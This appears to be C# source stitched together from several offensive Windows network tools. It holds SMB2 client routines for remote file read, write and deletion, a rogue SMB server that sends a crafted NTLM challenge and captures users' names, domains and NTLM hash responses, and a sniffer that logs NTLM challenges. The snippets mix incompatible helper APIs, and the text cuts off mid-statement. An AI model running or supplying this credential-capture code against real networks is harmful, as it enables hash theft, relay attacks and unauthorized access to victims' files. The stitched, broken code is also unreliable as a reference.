public static byte[] GetBytes(object smb2Command) { NetBIOSSessionService netBIOSSessionService = new NetBIOSSessionService(); SMB2Header smb2Header = new SMB2Header(); return(GetBytes(netBIOSSessionService, smb2Header, smb2Command)); }
public static byte[] GetBytes(NetBIOSSessionService netBIOSSessionService, SMB2Header smb2Header, object smb2Command) { byte[] headerData = smb2Header.GetBytes(); byte[] commandData = new byte[0]; switch (smb2Header.Command) { case 0: { SMB2NegotiateResponse command = (SMB2NegotiateResponse)smb2Command; commandData = command.GetBytes(); } break; case 1: { SMB2SessionSetupResponse command = (SMB2SessionSetupResponse)smb2Command; commandData = command.GetBytes(); } break; } netBIOSSessionService.Length = (ushort)(commandData.Length + 64); byte[] netbiosData = netBIOSSessionService.GetBytes(); return(Utilities.BlockCopy(netbiosData, headerData, commandData)); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// public void NegotiateSMB2() { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x00, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x00, 0x00 }); header.SetMessageID(messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); Byte[] bHeader = header.GetHeader(); SMB2NegotiateProtocolRequest protocols = new SMB2NegotiateProtocolRequest(); Byte[] bData = protocols.GetProtocols(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] send = Combine.combine(bSessionService, bHeader); send = Combine.combine(send, bData); streamSocket.Write(send, 0, send.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal Boolean LogoffRequest() { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x02, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SMB2SessionLogoffRequest logoffRequest = new SMB2SessionLogoffRequest(); Byte[] bData = logoffRequest.GetRequest(); if (signing) { header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); if (GetStatus(recieve.Skip(12).Take(4).ToArray())) return true; else return false; }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal void IoctlRequest(String share) { treeId = new Byte[] { 0x01, 0x00, 0x00, 0x00 }; SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x0b, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SMB2IoctlRequest ioctlRequest = new SMB2IoctlRequest(); ioctlRequest.SetFileName(share); Byte[] bData = ioctlRequest.GetRequest(); if (signing) { header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); treeId = new Byte[] { 0x00, 0x00, 0x00, 0x00 }; }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal void NTLMSSPNegotiate() { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x01, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x1f, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); Byte[] bHeader = header.GetHeader(); SMB2NTLMSSPNegotiate NTLMSSPNegotiate = new SMB2NTLMSSPNegotiate(version); NTLMSSPNegotiate.SetFlags(flags); Byte[] bNegotiate = NTLMSSPNegotiate.GetSMB2NTLMSSPNegotiate(); SMB2SessionSetupRequest sessionSetup = new SMB2SessionSetupRequest(); sessionSetup.SetSecurityBlob(bNegotiate); Byte[] bData = sessionSetup.GetSMB2SessionSetupRequest(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] send = Combine.combine(bSessionService, bHeader); send = Combine.combine(send, bData); streamSocket.Write(send, 0, send.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// private Int32 _ReadRequest2(Int64 offset, Int32 length) { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x08, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); header.SetChainOffset(new Byte[] { 0x00, 0x00, 0x00, 0x00 }); SMB2ReadRequest readRequest = new SMB2ReadRequest(); readRequest.SetGuidHandleFile(guidFileHandle); readRequest.SetLength(BitConverter.GetBytes(length)); readRequest.SetOffset(BitConverter.GetBytes(offset)); Byte[] bData = readRequest.GetRequest(); if (signing) { header.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); Combine combine = new Combine(); Int32 streamLength = 0; Byte[] dataRecieved = new Byte[0]; do { Byte[] part = new Byte[65619]; Int32 partLength = streamSocket.Read(part, 0, part.Length); streamLength += partLength; combine.Extend(part.Take(partLength).ToArray()); }while (streamLength < length); Int32 padding = length < 65535 ? 0 : 54; recieve = combine.Retrieve().Skip(84).Take(streamLength - 84 - padding).ToArray(); binaryWriter.Write(recieve); binaryWriter.Flush(); return(recieve.Length); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal Boolean SetInfoRequest(String sourceFilePath, String destination) { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x11, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SMB2SetInfo setInfo = new SMB2SetInfo(); setInfo.SetClass(new Byte[] { 0x01 }); setInfo.SetInfoLevel(new Byte[] { 0x14 }); setInfo.SetGUIDHandleFile(guidFileHandle); //This may need to be coverted to int32 using (FileStream fileStream = new FileStream(Path.GetFullPath(sourceFilePath), FileMode.Open, FileAccess.Read, FileShare.ReadWrite)) { using (BinaryReader binaryReader = new BinaryReader(fileStream)) { setInfo.SetBuffer(BitConverter.GetBytes(binaryReader.BaseStream.Length)); } } setInfo.SetGUIDHandleFile(guidFileHandle); Byte[] bData = setInfo.GetRequest(); header.SetChainOffset(bData.Length); if (signing) { header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(bSessionService, Combine.combine(bHeader, bData)); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); if (GetStatus(recieve.Skip(12).Take(4).ToArray())) { treeId = recieve.Skip(40).Take(4).ToArray(); return(true); } return(false); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal override Boolean ReadRequest() { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x08, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); header.SetChainOffset(new Byte[] { 0x00, 0x00, 0x00, 0x00 }); SMB2ReadRequest readRequest = new SMB2ReadRequest(); readRequest.SetGuidHandleFile(guidFileHandle); readRequest.SetLength(BitConverter.GetBytes(4096)); readRequest.SetOffset(BitConverter.GetBytes((Int64)0)); Byte[] bData = readRequest.GetRequest(); if (signing) { header.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); Int16 i = 0; while (smbClient.Available < 8192 && i < 10) { System.Threading.Thread.Sleep(100); i++; } Int32 streamLength = streamSocket.Read(recieve, 0, recieve.Length); Byte[] data = recieve.Skip(84).Take((Int32)streamLength).ToArray(); GetStatus(recieve.Skip(12).Take(4).ToArray()); return(true); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// public void NegotiateSMB() { SMBHeader smbHeader = new SMBHeader(); smbHeader.SetCommand(new Byte[] { 0x72 }); smbHeader.SetFlags(new Byte[] { 0x18 }); smbHeader.SetFlags2(new Byte[] { 0x01, 0x48 }); smbHeader.SetProcessID(processId.Take(2).ToArray()); smbHeader.SetUserID(new Byte[] { 0x00, 0x00 }); Byte[] bHeader = smbHeader.GetHeader(); SMBNegotiateProtocolRequest protocols = new SMBNegotiateProtocolRequest(); Byte[] bData = protocols.GetProtocols(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] send = Combine.combine(bSessionService, bHeader); send = Combine.combine(send, bData); streamSocket.Write(send, 0, send.Length); streamSocket.Flush(); Byte[] recieve = new Byte[81920]; streamSocket.Read(recieve, 0, recieve.Length); Byte[] response = recieve.Skip(5).Take(4).ToArray(); if (response == new Byte[] { 0xff, 0x53, 0x4d, 0x42 }) { Console.WriteLine("[-] SMB1 is not supported"); return; } version = "SMB2"; Byte[] keyLength = { 0x00, 0x00 }; if (recieve.Skip(70).Take(1).ToArray().SequenceEqual(new Byte[] { 0x03 })) { Console.WriteLine("[*] SMB Signing Required"); signing = true; flags = new Byte[] { 0x15, 0x82, 0x08, 0xa0 }; } else { signing = false; flags = new Byte[] { 0x05, 0x80, 0x08, 0xa0 }; } }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal override Boolean CreateRequest(String folder) { treeId = recieve.Skip(40).Take(4).ToArray(); SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x05, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SMB2CreateRequest createRequest = new SMB2CreateRequest(); if (!String.IsNullOrEmpty(folder)) { createRequest.SetFileName(folder); } createRequest.SetExtraInfo(1, 0); createRequest.SetCreateOptions(new Byte[] { 0x00, 0x00, 0x20, 0x00 }); createRequest.SetAccessMask(new Byte[] { 0x89, 0x00, 0x12, 0x00 }); createRequest.SetShareAccess(new Byte[] { 0x05, 0x00, 0x00, 0x00 }); Byte[] bData = createRequest.GetRequest(); if (signing) { header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); if (GetStatus(recieve.Skip(12).Take(4).ToArray())) { guidFileHandle = recieve.Skip(0x0084).Take(16).ToArray(); return(true); } return(false); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal Boolean SetInfoRequest() { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x11, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SMB2SetInfo setInfo = new SMB2SetInfo(); setInfo.SetClass(new Byte[] { 0x01 }); setInfo.SetInfoLevel(new Byte[] { 0x0d }); setInfo.SetGUIDHandleFile(guidFileHandle); setInfo.SetBuffer(new Byte[] { 0x01, 0x00, 0x00, 0x00 }); Byte[] bData = setInfo.GetRequest(); if (signing) { header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(bSessionService, Combine.combine(bHeader, bData)); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); if (GetStatusSilent(recieve.Skip(12).Take(4).ToArray())) { Console.WriteLine("[+] File Deleted"); return(true); } return(false); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// private Boolean Send(Byte[] bHeader, Byte[] bData) { NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); if (GetStatus(recieve.Skip(12).Take(4).ToArray())) { return(true); } else { return(false); } }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal virtual Boolean InfoRequest() { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x10, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SMB2GetInfo getInfo = new SMB2GetInfo(); getInfo.SetClass(new Byte[] { 0x02 }); getInfo.SetInfoLevel(new Byte[] { 0x05 }); getInfo.SetMaxResponseSize(new Byte[] { 0x50, 0x00, 0x00, 0x00 }); getInfo.SetGUIDHandleFile(recieve.Skip(132).Take(16).ToArray()); Byte[] bData = getInfo.GetRequest(); if (signing) { header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); if (GetStatus(recieve.Skip(12).Take(4).ToArray())) return true; else return false; }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// private void _WriteRequest(Byte[] buffer, Int64 offset) { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x09, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SMB2WriteRequest writeRequest = new SMB2WriteRequest(); writeRequest.SetGuidHandleFile(guidFileHandle); writeRequest.SetBuffer(buffer); writeRequest.SetOffset(offset); Byte[] bData = writeRequest.GetRequest(); header.SetChainOffset(bData.Length); if (signing) { header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(bSessionService, Combine.combine(bHeader, bData)); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal Boolean CloseRequest() { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x06, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SMB2CloseRequest closeRequest = new SMB2CloseRequest(); closeRequest.SetFileID(guidFileHandle); Byte[] bData = closeRequest.GetRequest(); if (signing) { header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } else { header.SetFlags(new Byte[] { 0x00, 0x00, 0x00, 0x00 }); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); return GetStatusSilent(recieve.Skip(12).Take(4).ToArray()); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal Boolean GetInfoRequest() { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x10, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SMB2GetInfo getInfo = new SMB2GetInfo(); getInfo.SetClass(new Byte[] { 0x02 }); getInfo.SetInfoLevel(new Byte[] { 0x01 }); getInfo.SetMaxResponseSize(new Byte[] { 0x58, 0x00, 0x00, 0x00 }); getInfo.SetGetInfoInputOffset(new Byte[] { 0x00, 0x00 }); getInfo.SetGUIDHandleFile(guidFileHandle); Byte[] bData = getInfo.GetRequest(); header.SetChainOffset(bData.Length); if (signing) { header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); SMB2Header header2 = new SMB2Header(); header2.SetCommand(new Byte[] { 0x10, 0x00 }); header2.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header2.SetMessageID(++messageId); header2.SetProcessID(processId); header2.SetTreeId(treeId); header2.SetSessionID(sessionId); header2.SetFlags(new Byte[] { 0x00, 0x00, 0x00, 0x04 }); SMB2GetInfo getInfo2 = new SMB2GetInfo(); getInfo2.SetClass(new Byte[] { 0x02 }); getInfo2.SetInfoLevel(new Byte[] { 0x05 }); getInfo2.SetMaxResponseSize(new Byte[] { 0x50, 0x00, 0x00, 0x00 }); getInfo2.SetGetInfoInputOffset(new Byte[] { 0x00, 0x00 }); getInfo2.SetGUIDHandleFile(guidFileHandle); Byte[] bData2 = getInfo2.GetRequest(); if (signing) { header2.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header2.SetSignature(sessionKey, ref bData2); } Byte[] bHeader2 = header2.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length + bHeader2.Length); sessionService.SetDataLength(bData.Length + bData2.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Combine combine = new Combine(); combine.Extend(bHeader); combine.Extend(bData); combine.Extend(bHeader2); combine.Extend(bData2); Byte[] bSend = Combine.combine(bSessionService, combine.Retrieve()); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); if (GetStatus(recieve.Skip(12).Take(4).ToArray())) { return(true); } return(false); }
internal void ReceiveClient(object parameters) { object[] parameterArray = parameters as object[]; Guid serverGuid = (Guid)parameterArray[0]; TcpClient tcpClient = (TcpClient)parameterArray[1]; int port = (int)parameterArray[2]; NetworkStream tcpStream = tcpClient.GetStream(); bool isSMB2; string challenge = ""; string clientIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString(); string clientPort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); try { while (tcpClient.Connected && isRunning) { byte[] requestData = new byte[4096]; do { Thread.Sleep(100); }while (!tcpStream.DataAvailable && tcpClient.Connected); while (tcpStream.DataAvailable) { tcpStream.Read(requestData, 0, requestData.Length); } NetBIOSSessionService requestNetBIOSSessionService = new NetBIOSSessionService(requestData); SMBHelper smbHelper = new SMBHelper(); if (requestNetBIOSSessionService.Type == 0 || smbHelper.Protocol[0] == 0xfe || smbHelper.Protocol[0] == 0xff) { int sessionServiceIndex = 0; if (requestNetBIOSSessionService.Type == 0) { sessionServiceIndex = 4; } byte[] sendBuffer = new byte[0]; SMBHeader requestSMBHeader = new SMBHeader(); SMB2Header requestSMB2Header = new SMB2Header(); smbHelper.ReadBytes(requestData, sessionServiceIndex); if (smbHelper.Protocol[0] == 0xfe) { isSMB2 = true; requestSMB2Header.ReadBytes(requestData, sessionServiceIndex); } else { isSMB2 = false; requestSMBHeader.ReadBytes(requestData, sessionServiceIndex); } if (!isSMB2 && requestSMBHeader.Command == 0x72 || (isSMB2 && requestSMB2Header.Command == 0)) { SMB2NegotiatelRequest smb2NegotiatelRequest = new SMB2NegotiatelRequest(requestData, 64 + sessionServiceIndex); SMB2Header responseSMB2Header = new SMB2Header(); SMB2NegotiateResponse smb2NegotiateResponse = new SMB2NegotiateResponse(); if (!isSMB2) { smb2NegotiateResponse.DialectRivision = new byte[2] { 0xff, 0x02 }; smb2NegotiateResponse.Capabilities = new byte[4] { 0x07, 0x00, 0x00, 0x00 }; OutputNegotiation("SMB1", listenerPort, clientIP, clientPort); } else if (isSMB2) { responseSMB2Header.MessageId = requestSMB2Header.MessageId; if (smb2NegotiatelRequest.GetMaxDialect() == 0x311) { smb2NegotiateResponse.DialectRivision = new byte[2] { 0x11, 0x03 }; smb2NegotiateResponse.NegotiateContextCount = 3; smb2NegotiateResponse.Capabilities = new byte[4] { 0x2f, 0x00, 0x00, 0x00 }; smb2NegotiateResponse.NegotiateContextOffset = 448; smb2NegotiateResponse.NegotiateContextList = new SMB2NegotiateContext().GetBytes(new string[] { "1", "2", "3" }); OutputNegotiation("SMB3", listenerPort, clientIP, clientPort); } else { smb2NegotiateResponse.DialectRivision = new byte[2] { 0x10, 0x02 }; smb2NegotiateResponse.Capabilities = new byte[4] { 0x07, 0x00, 0x00, 0x00 }; OutputNegotiation("SMB2", listenerPort, clientIP, clientPort); } responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; // todo fix } smb2NegotiateResponse.EncodeBuffer(); smb2NegotiateResponse.ServerGUID = serverGuid.ToByteArray(); sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2NegotiateResponse); } else if (isSMB2 && requestSMB2Header.Command > 0) { switch (requestSMB2Header.Command) { case 1: { SMB2SessionSetupRequest smb2SessionSetupRequest = new SMB2SessionSetupRequest(requestData, 64 + sessionServiceIndex); NTLMNegotiate requestNTLMNegotiate = new NTLMNegotiate(smb2SessionSetupRequest.Buffer, true); if (requestNTLMNegotiate.MessageType == 1) { SMB2Header responseSMB2Header = new SMB2Header(); SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(); responseSMB2Header.Status = new byte[4] { 0x16, 0x00, 0x00, 0xc0 }; responseSMB2Header.CreditCharge = 1; responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; responseSMB2Header.Command = 1; responseSMB2Header.Flags = new byte[4] { 0x11, 0x00, 0x00, 0x00 }; responseSMB2Header.MessageId = requestSMB2Header.MessageId; responseSMB2Header.SessionId = BitConverter.GetBytes(smb2Session); smb2Session++; smb2SessionSetupResponse.Pack(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain, out byte[] challengeData); sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse); challenge = BitConverter.ToString(challengeData).Replace("-", ""); OutputChallenge(listenerPort, clientIP, clientPort, challenge); } else if (requestNTLMNegotiate.MessageType == 3) { NTLMResponse ntlmResponse = new NTLMResponse(smb2SessionSetupRequest.Buffer, true); string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); string user = Encoding.Unicode.GetString(ntlmResponse.UserName); string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); string response = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); OutputNTLM("SMB", listenerPort, clientIP, clientPort, user, domain, host, challenge, response, lmResponse); SMB2Header responseSMB2Header = new SMB2Header(); SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(); responseSMB2Header.Status = new byte[4] { 0x6d, 0x00, 0x00, 0xc0 }; //responseSMB2Header.Status = new byte[4] { 0x00, 0x00, 0x00, 0x00 }; //responseSMB2Header.Status = new byte[4] { 0x22, 0x00, 0x00, 0xc0 }; //access denied responseSMB2Header.CreditCharge = 1; responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; responseSMB2Header.Command = 1; responseSMB2Header.Flags = new byte[4] { 0x11, 0x00, 0x00, 0x00 }; responseSMB2Header.MessageId = requestSMB2Header.MessageId; responseSMB2Header.SessionId = requestSMB2Header.SessionId; smb2SessionSetupResponse.SecurityBufferOffset = 0; sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse); } } break; } } tcpStream.Write(sendBuffer, 0, sendBuffer.Length); tcpStream.Flush(); } else { tcpClient.Close(); } } } catch (Exception ex) { OutputError(ex, port); } }
internal static void ProcessSMB(byte[] data, string clientIP, string listenerIP, string clientPort, string listenerPort) { if (data.Length >= 4) { NetBIOSSessionService requestNetBIOSSessionService = new NetBIOSSessionService(data); SMBHeader smbHeader = new SMBHeader(); SMB2Header smb2Header = new SMB2Header(); int sessionServiceIndex = 0; if (requestNetBIOSSessionService.Type == 0) { sessionServiceIndex = 4; } SMBHelper helper = new SMBHelper(data, sessionServiceIndex); string session; string challenge; if (helper.Protocol[0] == 0xff) { smbHeader.ReadBytes(data, sessionServiceIndex); string flags = Convert.ToString(smbHeader.Flags, 2).PadLeft(8, '0'); switch (smbHeader.Command) { case 0x72: { if (String.Equals(flags.Substring(0, 1), "0")) { Output.Queue(String.Format("[.] [{0}] SMB1({1}) negotiation request detected from {2}:{3}", Output.Timestamp(), listenerPort, clientIP, clientPort)); } } break; case 0x73: { if (String.Equals(flags.Substring(0, 1), "1")) { SMBCOMSessionSetupAndXResponse smbCOMSessionSetupAndXResponse = new SMBCOMSessionSetupAndXResponse(data, 32 + sessionServiceIndex); if (smbCOMSessionSetupAndXResponse.SecurityBlobLength > 0) { if (!BitConverter.ToString(smbCOMSessionSetupAndXResponse.SecurityBlob).Contains("2A-86-48-86-F7-12-01-02-02")) // kerberos { NTLMHelper ntlmHelper = new NTLMHelper(smbCOMSessionSetupAndXResponse.SecurityBlob); if (ntlmHelper.Signature.StartsWith("NTLMSSP")) { if (ntlmHelper.MessageType == 2) { NTLMChallenge ntlmChallenge = new NTLMChallenge(smbCOMSessionSetupAndXResponse.SecurityBlob); session = String.Concat(listenerIP, ":", listenerPort); challenge = BitConverter.ToString(ntlmChallenge.ServerChallenge).Replace("-", ""); Program.smbSessionTable[session] = challenge; Output.Queue(string.Format("[+] [{0}] SMB({1}) NTLM challenge [{2}] sent to {3}:{4}", Output.Timestamp(), clientPort, challenge, clientIP, listenerPort)); } } } else { Output.Queue(string.Format("[.] [{0}] SMB({1}) Kerberos authentication from {2}:{3}", Output.Timestamp(), clientPort, clientIP, listenerPort)); } } } else { SMBCOMSessionSetupAndXRequest smbCOMSessionSetupAndXRequest = new SMBCOMSessionSetupAndXRequest(data, 32 + sessionServiceIndex); if 